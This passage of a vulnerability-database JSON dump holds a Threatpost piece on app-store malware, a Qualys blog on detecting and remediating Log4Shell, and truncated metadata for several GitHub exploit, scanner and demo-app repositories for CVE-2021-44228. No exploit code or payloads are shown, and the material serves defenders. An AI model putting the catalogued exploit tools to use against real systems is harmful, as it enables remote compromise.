Xenomorph banking trojan recently [discovered](<https://threatpost.com/xenomorph-malware-google-play-facehugger/178563/>) by ThreatFabric, and the most ironic must surely be Vultur, a trojan tucked into a fully functioning two-factor authentication (2FA) app that recently [infected](<https://threatpost.com/2fa-app-banking-trojan-google-play/178077/>) 10,000 victims who downloaded it from Google Play.\n\nElectron Bot\u2019s successful incursion into Microsoft\u2019s official app store is just the latest glaring example of how people throw caution to the wind when they see a shiny new toy on the app stores, CPR researchers warned: \u201cGiven most people think that you can trust application store reviews, they do not hesitate to download an application from there.\u201d\n\nCPR passed on these safety tips:\n\n * Avoid downloading an application with a small number of reviews.\n * Look for applications with good, consistent and reliable reviews.\n * Pay attention to suspicious application naming that\u2019s not identical to the original name.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-24T18:42:49", "type": "threatpost", "title": "Microsoft App Store Sizzling with New \u2018Electron Bot\u2019 Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-24T18:42:49", "id": "THREATPOST:31D14CEE5977BF71F79F7C30AEC10698", "href": "https://threatpost.com/microsoft-app-store-electron-bot-malware/178629/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-12-29T22:47:45", "description": "_Since the Log4Shell vulnerability was first discovered, Qualys has analyzed and responded to the threat in a systematic way approaching it from all angles \u2013 detection, mitigation and remediation. Recognizing the challenge it poses to large enterprises, we recommend that organizations follow a prioritized, layered approach in addressing this vulnerability._\n\nSince the Log4Shell vulnerability was first discovered, the Qualys Research Team has analyzed the threat and updated Qualys Cloud Platform to help customers respond quickly.\n\nWe recognize that for many organizations the scope of the challenge is large, as it involves all Java-based applications in their environment. Recognizing which application was written in Java, let alone if it uses a vulnerable version of Log4j, can be a challenge. As a result, Qualys recommends that organizations take a prioritized, layered approach to remediate and eliminate this vulnerability wherever it lives.\n\n* * *\n\n### Log4Shell \u2013 5 Key Things You Need to Know\n\n 1. Java is the third most used computer language.\n 2. Log4j is used in most Java based applications. You should assume that any application, home grown or purchased, in your environment that is based on Java - including web, server, database, desktop, and client applications (even games) - may be impacted and must be validated.\n 3. Detection is not straightforward, as there is no standard way of using Log4j inside Java applications, and therefore multiple detection techniques are required.\n 4. The vulnerability is very easy to exploit and exploit tools are already available to download. Attackers are actively exploiting this vulnerability at a rate of 100+ attacks per minute!\n 5. The US Cybersecurity & Infrastructure Security Agency (CISA) has directed all civilian agencies to mitigate [CVE-2021-44228](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) by December 24, 2021 \u2013 Christmas Eve \u2013 which clearly communicates the urgent risk introduced by this vulnerability.\n\n* * *\n\n### What Attackers Know and What They Are Doing\n\nLog4Shell is a new, easy-to-exploit vulnerability that was discovered in mid-December 2021. It is potentially one of the most significant code errors ever discovered, given the prevalence of Java. Most of the world\u2019s enterprises are still trying to figure out if they are impacted and to what extent. Because Java is commonly used to build web applications, it made Log4Shell easy to proliferate across the web. Even worse, most web applications connect to a backend application that is most likely also written in Java. This means that one successful exploit could result in additional exploits downstream.\n\nThe bottom line: compromises of public-facing web applications around the world with this newly discovered, easy to exploit vulnerability have a good chance of succeeding. \n\nInevitably, many security firms have already reported seeing large-scale attacks against publicly facing web applications that leverage the Log4Shell vulnerability.\n\n### So What Can You Do\n\n### STEP 1: Quickly Scan Your External Attack Surface\n\nAs a first step, Qualys recommends that all organizations quickly scan their external attack surface (public-facing websites and applications) to identify any potential vulnerability by simulating the attack. using the [free service](<http://www.qualys.com/was-log4shell-help>) we have provided. \n\nOur Research Team has created dedicated attack simulations that mimic Log4Shell attack vectors currently in use. Customers can easily run those simulations directly from the Qualys cloud without the need to install any software or reconfigure their network. By running these simulations, customers can see what attackers see, and be alerted if one of their publicly available websites is exposed.\n\n**Qualys has made its Web Application Scanner (WAS) application available for everyone for 30 days.**\n\n### STEP 2: Find Where You Are Vulnerable and Prioritize \n\nA big challenge introduced by this vulnerability is detecting it. As Log4Shell may affect any Java application that uses a vulnerable version of Log4j, it is important to consider the following:\n\n * Java is used in different ways for different applications, in some cases it is not straightforward to even recognize a Java application\n * Java applications can run on different platforms and OSes, from servers to workstations to appliances\n * By its nature the Log4j library can be embedded in nonstandard ways, which is making the detection of all vulnerable Log4j instances not a straightforward task\n\nAs such, Qualys offers a multi-layered approach to help our customers detect where they are vulnerable. These layers are comprised of three of our apps: CSAM, VMDR, and Container Security.\n\n#### Qualys Cybersecurity Asset Management (CSAM) ****\n\nQuerying inventory is an efficient way to find Java-based software installed in your environment. However, since Java-based applications may be common in any environment, such queries may return a long list of applications that will require a time-consuming process to validate. It is better to focus your time on other higher priority tasks.\n\nTo help our customers run more efficient inventory queries for suspected Java applications, the Qualys Research Team has enriched the inventory data collected by CSAM. We can now flag applications that are recognized by the community as vulnerable to the Log4Shell exploit (based on [this GitHub](<https://github.com/cisagov/log4j-affected-db>)). Furthermore, by utilizing CSAM\u2019s ability to tag internet-facing assets, those queries can focus first on your external facing Java-based applications that are flagged as vulnerable. CSAM integration with your CMDB provides another method for prioritization, as it will allow you to focus on your business-critical applications first.\n\n#### Qualys Vulnerability Management Detection and Response (VMDR)****\n\nQualys Research Team has added multiple signatured QIDs that are designed to detect this vulnerability on all assets in your organization.\n\nAs explained above, by its nature this vulnerability is harder to detect and will require a multi-layered approach for detection. Qualys recommends its customers use different types of detection methods that are designed to complement each other:\n\n * First, a fast, accurate detection for commonly used Java and Log4j deployment methods. The benefit of this set of QIDs is their ability to be used as part of your regular VM scans as they are efficient and accurate. However, the downside is that they may miss some applications that do not use Java or Log4j in standard ways.\n * Second, a complimentary, out-of-band, in-depth detection method. That is designed to detect the majority of Log4j vulnerable instances, regardless of the deployment method used or the application status. This is an accurate method of detecting the Log4Shell vulnerability but may require intensive computation and more time to scan. As such, this detection method should be used out-of-band and does not need to run as frequently as the faster detection methods mentioned above.\n\nNote: even if the application does not log anything that can be compromised by an attacker, Qualys still recommends that you treat this application as vulnerable and patch it. Qualys detection logic assumes that a vulnerable application is one that has a vulnerable version of Log4j.\n\n#### Qualys Container Security****\n\nAs containers are common in many environments, and Java is a commonly used language for building applications that run in containers, scanning for the Log4Shell vulnerability in your containers is a critical next step. Qualys' Container Security product offers multiple methods to help you detect Log4Shell in your container environment for running containers and container images. Qualys offers multiple methods to help you detect Log4Shell in your container environment. Initially, we recommend running a vulnerability scan against all your running containers. Similar to our VMDR scan mentioned above, those runtime scans will help identify all instances of this vulnerability in cases where the app is using the common methods of deploying Java and Log4J. But similar to VMDR detection, Qualys recommends utilizing our dedicated, in-depth detection to complement the runtime detection methods. This dedicated, in-depth detection logic for all vulnerable Log4j instances can interact with your build and/or deployment process and perform an in-depth scan of your container images. This in-depth container image scan can be triggered in three different stages of your container\u2019s image lifecycle: during the build process, as the image is uploaded to the register, and before the image is deployed to production.\n\nQualys Container Security offers a comprehensive solution for detecting Log4Shell vulnerabilities across the entire lifecycle of the container from build time to runtime.\n\n### STEP 3: Remediation \n\nOnce your higher priority vulnerable applications are identified, we recommend that our customers begin their remediation processes. As the Log4Shell vulnerability may affect every Java-based application, different remediation methods will be required. Each should be based on the unique application type and function.\n\nAs vendors start to release patches to their Java-based vulnerable applications, we recommend using Qualys Patch Management to patch your Linux and Windows assets in an efficient way.\n\nHowever, in some cases the vulnerable Java application will require a \u201csurgical\u201d fix as it cannot be patched. In such cases the patch management solution can be used to update the Log4j jar to a non-vulnerable version, or to delete the JNDI class as recommended by Apache.\n\n### STEP 4: Detect Exploits****\n\nDue to the complexity of detecting and remediating this vulnerability, we recommend utilizing Qualys EDR to help detect exploit attempts in real-time. Qualys EDR has been updated with specific content and workflows to help monitor and alert suspicious activities related to the Log4Shell exploit. Using the EDR tool, customers can view real-time threat reports and triage exploits in cases where a suspicious activity was detected. We at Qualys hope that this blog has provided you with some guideposts to follow when confronting how Log4Shell may threaten your environment. Please bookmark [the Log4Shell section](<https://www.qualys.com/log4shell>) of our website and return regularly for the latest threat intelligence.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-28T18:00:00", "type": "qualysblog", "title": "Log4Shell \u2013 Follow This Multi-Layered Approach for Detection and Remediation", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-28T18:00:00", "id": "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-29T22:22:29", "description": "# Log4j-Windows-Scanner\nCVE-2021-44228 vulnerability in Apache L...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T10:37:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-29T19:51:54", "id": "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-14T11:34:08", "description": "# CVE-2021-44228-VULN-APP\n- NOTE: This is not a virtual vuln...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T18:45:19", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T08:27:22", "id": "DEE433F2-3A1C-513B-AE6B-E11EFFB5A8E4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-22T23:09:03", "description": "# IMPORTANT DISCLAIMER\n\n**THIS SCRIPT CAN LAND YOU IN SERIOUS TR...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T19:37:48", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T15:04:11", "id": "E59C9A70-6F3E-5CF6-9F15-B0039E0FBAF1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-01T18:29:04", "description": "# log4j-exploit-builder\nScript to create...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T17:41:48", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-01T14:21:09", "id": "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-01T03:39:12", "description": "# f5-waf-enforce-sigs-CVE-2021-44228\nThis enforces signatures fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T21:59:19", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T22:21:51", "id": "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:12:48", "description": "# Evaluate the Log4Shell: RCE 0-day Issue\n\nThis repo contains t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T02:26:56", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T03:53:41", "id": "F32DF396-0485-5F43-8A52-31B8DD252790", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T03:41:28", "description": "# CVE-2021-44228 \u2013 Log4j RCE Unauthenticated\n\n## About\n\nThis is ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T02:18:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-23T03:23:09", "id": "945E86E8-E114-5F51-991C-13742C6EF49E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-11T13:15:07", "description": "# vuln4japi\nA vulnerable Java based REST API for demonstrating C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-08T06:45:44", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-10T08:20:25", "id": "FEFA5AE8-5C94-5174-B44C-AC52B9AEAEAD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-28T18:11:27", "description": "# Overview\nThis repository contains OpenIOC rules to facilitate ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T03:55:32", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-28T17:43:05", "id": "39D0749D-74E3-5D08-804A-6E7E52BCE692", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-10T22:04:58", "description": "# Vulnerable application\n\nThis repository contains a Spring Boot...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-31T20:39:44", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-01T10:57:33", "id": "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:15:05", "description": "# Sample Log4j2 vulnerable application (CVE-2021-44228) \n# Versi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-12T13:00:38", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T04:00:49", "id": "D813949A-183D-55ED-AF64-B130B8F95A56", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-14T05:28:49", "description": "# CVE-2021-44228\n\n[![Dockerfile](https://github.com/ahmad4fifz/C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-14T04:09:36", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T04:09:57", "id": "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-17T16:32:14", "description": "# Log4jTools\nTools for investigating Log4j CVE-2021-44228\n\n## Bu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T19:08:14", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in 